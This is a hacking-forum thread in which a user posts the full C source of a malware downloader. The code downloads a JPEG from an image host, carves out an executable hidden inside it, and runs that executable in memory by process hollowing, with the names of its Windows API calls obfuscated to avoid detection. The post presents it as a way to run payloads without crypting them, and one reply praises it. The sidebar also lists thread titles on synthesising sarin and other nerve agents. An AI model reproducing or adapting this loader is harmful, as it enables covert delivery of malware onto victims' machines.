+- +-

+-User

Welcome, Guest.
Please login or register.
 
 
 
Forgot your password?

+-Stats

Members
Total Members: 130
Latest: REEG
New This Month: 1
New This Week: 0
New Today: 0
Stats
Total Posts: 319
Total Topics: 160
Most Online Today: 2
Most Online Ever: 159
(June 29, 2021, 10:20:55 pm)
Users Online
Members: 0
Guests: 1
Total: 1

Author Topic: Downloader in c  (Read 776 times)

xoreaxeax

  • Newbie
  • *
  • Posts: 6
    • View Profile
Downloader in c
« on: November 08, 2016, 04:15:33 am »
hi everyone I would like to share with you my  downloader source code
it work like this :
1-you have to combine a jpeg with exe file
2-after that u have t upload that image in web site which not corrupt image file and save the size image like this site :http://e.top4top.net
3-paste the link of downloading as showen in vedio
4- downloader will extract exe from jpg and run it directly from memory that's mean you dont need to crypt exe file ;D
so I let u with the vedio and source code

https://www.youtube.com/watch?v=aDaDxVji7PI

Code: [Select]
#include <windows.h>
 
typedef LONG(NTAPI * NtUnmapViewOfSection)(HANDLE,PVOID);
typedef  BOOL(WINAPI *WPM) (HANDLE,LPVOID,LPCVOID,SIZE_T,SIZE_T);//WriteProcessMemory
typedef  BOOL(WINAPI *RPM) (HANDLE, LPCVOID, LPVOID, SIZE_T, SIZE_T);//ReadProcessMemory
typedef  BOOL(WINAPI *CP) (LPCTSTR, LPTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);//CreateProcess
typedef LPVOID(WINAPI *VAE)(HANDLE,LPVOID,SIZE_T,DWORD,DWORD);//VirtualAllocEx
 
typedef LPVOID(WINAPI *IO)(LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);//InternetOpen
typedef LPVOID(WINAPI *IOU)(LPVOID,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);//InternetOpenUrl
typedef BOOL(WINAPI *IRF)(LPVOID,LPVOID,DWORD,LPDWORD);//InternetReadFile
typedef BOOL(WINAPI *ICH)(LPVOID);//InternetCloseHandle
 
char wpmem[] = {0x56,0x71,0x68,0x73,0x64,0x4f,0x71,0x6e,0x62,0x64,0x72,0x72,0x4c,0x64,0x6c,0x6e,0x71,0x78,0x00 };//crypted name of WriteProcessMemory
char rpmem[] = {0x51,0x64,0x60,0x63,0x4f,0x71,0x6e,0x62,0x64,0x72,0x72,0x4c,0x64,0x6c,0x6e,0x71,0x78,0x00 };//crypted name of ReadProcessMemory
char cp[] = {0x42,0x71,0x64,0x60,0x73,0x64,0x4f,0x71,0x6e,0x62,0x64,0x72,0x72,0x40,0x00 };//crypted name of CreateProcess
char vae[] = {0x55,0x68,0x71,0x73,0x74,0x60,0x6b,0x40,0x6b,0x6b,0x6e,0x62,0x44,0x77,0x00 };//crypted name of VirtualAllocEx
 
char io[] = {0x48,0x6d,0x73,0x64,0x71,0x6d,0x64,0x73,0x4e,0x6f,0x64,0x6d,0x40,0x00};//crypted name of InternetOpen
char iou[] = {0x48,0x6d,0x73,0x64,0x71,0x6d,0x64,0x73,0x4e,0x6f,0x64,0x6d,0x54,0x71,0x6b,0x40,0x00 };//crypted name of InternetOpenUrl
char irf[] = {0x48,0x6d,0x73,0x64,0x71,0x6d,0x64,0x73,0x51,0x64,0x60,0x63,0x45,0x68,0x6b,0x64,0x00 };//crypted name of InternetReadFile
char ich[] = {0x48,0x6d,0x73,0x64,0x71,0x6d,0x64,0x73,0x42,0x6b,0x6e,0x72,0x64,0x47,0x60,0x6d,0x63,0x6b,0x64,0x00};//crypted name of InternetCloseHandle
 
unsigned char *exe = NULL;//Container for Pe file (exe) which we will extract from jpg file
 
//function to dycrypt Functions names ...
 
int funconvert(char func[])
{
    int a = strlen(func);
    for (int i = 0; i < strlen(func); i++)
    {
        func[i] = func[i] + 1;
    }
    return 0;
}
 
//run exe from memory .
int runexe(LPSTR path)
{
    DWORD base;
    LPVOID pimage;
    PIMAGE_DOS_HEADER pidh;
    PIMAGE_NT_HEADERS pinh;
    PIMAGE_SECTION_HEADER pish;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    PCONTEXT ctx;
    NtUnmapViewOfSection Ntu;
    WPM wpm ;
    RPM rpm;
    CP crp;
    VAE vaex;
    funconvert(cp);
    if ((crp = CP(GetProcAddress(GetModuleHandle("kernel32.dll"), cp))) == 0)return 1; //get the address of CreateProcess
 
    funconvert(wpmem);
    if ((wpm = WPM(GetProcAddress(GetModuleHandle("kernel32.dll"), wpmem))) == 0)return 1;//get the address of WriteProcessMemory
 
    funconvert(rpmem);
    if ((rpm = RPM(GetProcAddress(GetModuleHandle("kernel32.dll"), rpmem))) == 0)return 1;//get the address of ReadProcessMemory
 
    funconvert(vae);
    if((vaex = VAE(GetProcAddress(GetModuleHandle("kernel32.dll"), vae))) == 0)return 1;//get the address of VirtualAllocEx
 
    ZeroMemory(&si,sizeof(si));
    ZeroMemory(&pi,sizeof(pi));
 
    pidh = (PIMAGE_DOS_HEADER)exe;// get dos header of Pe file
 
    if (pidh->e_magic != IMAGE_DOS_SIGNATURE)// check if it's valid Pe file or not ..
    {
        return 1;
    }
 
    pinh = (PIMAGE_NT_HEADERS)(exe + pidh->e_lfanew);//get nt headers of pe file
 
    if (!crp(path, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))// Create a suspended Process
    {
        return 1;
    }
 
    ctx = (PCONTEXT)VirtualAlloc(NULL, sizeof(ctx), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);//Allocote a space for Context stracture
 
    ctx->ContextFlags = CONTEXT_FULL;
    GetThreadContext(pi.hThread, (LPCONTEXT)ctx);
    rpm(pi.hProcess, LPCVOID(ctx->Ebx + 8), &base, sizeof(DWORD), NULL);
 
    if ((DWORD)base ==pinh->OptionalHeader.ImageBase)
    {
        Ntu = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"),"NtUnmapViewOfSection"));
        Ntu(pi.hProcess, PVOID(base));
    }
 
    pimage = vaex(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 
    wpm(pi.hProcess, (PVOID)pimage, exe, pinh->OptionalHeader.SizeOfHeaders, NULL);// Write headers to target process
 
    for (int i = 0; i < pinh->FileHeader.NumberOfSections; i++)//write sections to target process
    {
        pish = (PIMAGE_SECTION_HEADER)(exe +pidh->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i);
        wpm(pi.hProcess,(PVOID)((DWORD)pimage+pish->VirtualAddress),exe+pish->PointerToRawData,pish->SizeOfRawData,NULL);         
    }
    wpm(pi.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)&pinh->OptionalHeader.ImageBase, sizeof(DWORD), NULL);
    ctx->Eax =(DWORD)pimage + pinh->OptionalHeader.AddressOfEntryPoint;
    SetThreadContext(pi.hThread,LPCONTEXT(ctx));
    ResumeThread(pi.hThread);
return 0;
}
 
int imagetoexe(unsigned char* buffer ,DWORD size)
{
    DWORD i = 0;
    DWORD exesize;
    unsigned char sign []= {0xFF,0xD9};
    while (!(buffer[i]==sign[0] && buffer[i+1]==sign[1]))
    {
        i++;
    }
    if (i >= size)
    {
        return 1;
    }
    else
    {
        exesize = size - i;
    }
    exe = (unsigned char *)malloc(exesize);
    memcpy(exe,buffer+i+2, exesize);
    return 0;
}
 
int main()
{
    DWORD dw=0;
    IO iof;
    IOU iouf;
    IRF irfd;
    ICH ichf;
 
    LPCSTR URL ="http://e.top4top.net/xxxxxx.jpg";
 
    funconvert(io);
    funconvert(iou);
    funconvert(irf);
    funconvert(ich);
 
    unsigned char *buff;
    DWORD size=4096*1000;
    LPVOID hints =NULL;
    LPVOID url = NULL;
    buff =(unsigned char *) malloc(4096*10000);
 
    if ((iof = IO(GetProcAddress(LoadLibrary("wininet.dll"), io)))!=0)
    {
        hints = iof("test", 0, NULL, NULL, 0);
        if (hints == NULL)return 1;
    }
    else
    {
        return 1;
    }
    if ((iouf = IOU(GetProcAddress(LoadLibrary("wininet.dll"), iou))) != 0)
    {
        url = iouf(hints, URL, NULL, 0, 0, 0);
        if (url == 0)return 0;
    }
    else
    {
        return 1;
    }
    if ((irfd = IRF(GetProcAddress(LoadLibrary("wininet.dll"), irf))) != 0)
    {
        BOOL state = irfd(url, (unsigned char *)buff, (DWORD)size, &dw);
        if (state = FALSE)
        {
            return 1;
        }
    }
    else
    {
        return 1;
    }
 
    if ((ichf = ICH(GetProcAddress(LoadLibrary("wininet.dll"), ich))) != 0)
    {
        ichf(hints);
    }
 
   
    imagetoexe(buff,dw);// Extract exe from jpg file
    runexe("C:\\Users\\zika\\Desktop\\combine\\str_len.exe");// to run exe from memory
    return 0;
}

Share on Facebook Share on Twitter

Like Like x 1 View List

wzleonardo

  • Newbie
  • *
  • Posts: 1
    • View Profile
Re: Downloader in c
« Reply #1 on: September 14, 2017, 01:32:38 am »
oh my god im impressed how many things we can make on c++ OMG O_O. pls teach me more things <3

 

+-Recent Topics

Independent Call Girls in Chandigarh by dilpreetkaur
June 21, 2021, 01:02:52 pm

Hi zwclose7. How to create process by using NT apis? by zwclose7
June 01, 2021, 03:09:52 pm

Poison of the Day by zwclose7
March 16, 2020, 06:45:08 pm

IRC by AzeS
February 17, 2020, 08:18:01 am

Native API tutorial by hMihaiDavid
January 08, 2019, 02:11:02 am

The properties of GP nerve agent by xchg
October 19, 2018, 07:40:57 pm

A new route of synthesis for G-series agents by Basquyatti
October 15, 2018, 06:12:57 am

Synthesis of Methylisobutylcarbinylsarin (GH) by APC process by Basquyatti
October 14, 2018, 07:55:33 am

Synthesis conventional of Sarin by Basquyatti
October 02, 2018, 07:57:32 am

Reaction CX-7 (Experimental) by zwclose7
October 02, 2018, 12:46:47 am